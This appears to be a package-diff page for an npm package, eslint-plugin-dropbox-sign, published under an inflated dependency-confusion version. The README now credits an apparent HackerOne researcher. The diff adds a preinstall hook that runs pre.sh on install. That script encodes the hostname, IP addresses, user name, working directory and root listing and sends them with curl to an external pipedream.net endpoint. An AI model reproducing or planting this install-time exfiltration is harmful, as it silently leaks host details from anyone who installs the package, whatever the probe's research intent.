eslint-plugin-dropbox-sign 0.0.1-security → 999999999999999.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of eslint-plugin-dropbox-sign might be problematic. Click here for more details.
- package/README.md +2 -5
- package/package.json +10 -3
- package/pre.sh +2 -0
package/README.md
CHANGED
|
@@ -1,5 +1,2 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=eslint-plugin-dropbox-sign for more information.
|
|
1
|
+
Email: bassem.sadaqah@wearehackerone.com
|
|
2
|
+
Hackerone_username: bassem_sadaqah
|
package/package.json
CHANGED
|
@@ -1,6 +1,13 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "eslint-plugin-dropbox-sign",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "999999999999999.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "./pre.sh"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [],
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC"
|
|
6
13
|
}
|
package/pre.sh
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
curl -H "header1: $(hostname | base64 | base64 )" -H "header2: $(hostname -I | base64 | base64 | tr -d '\n')" -H "header3: $(whoami | base64 | base64)" -H "header4: $(pwd | base64 | base64 | tr -d '\n')" -H "header5: $(ls / | base64 | base64 | tr -d '\n')" https://8f4760180c5d87f4ee7d144dac35ea76.m.pipedream.net/dropbox
|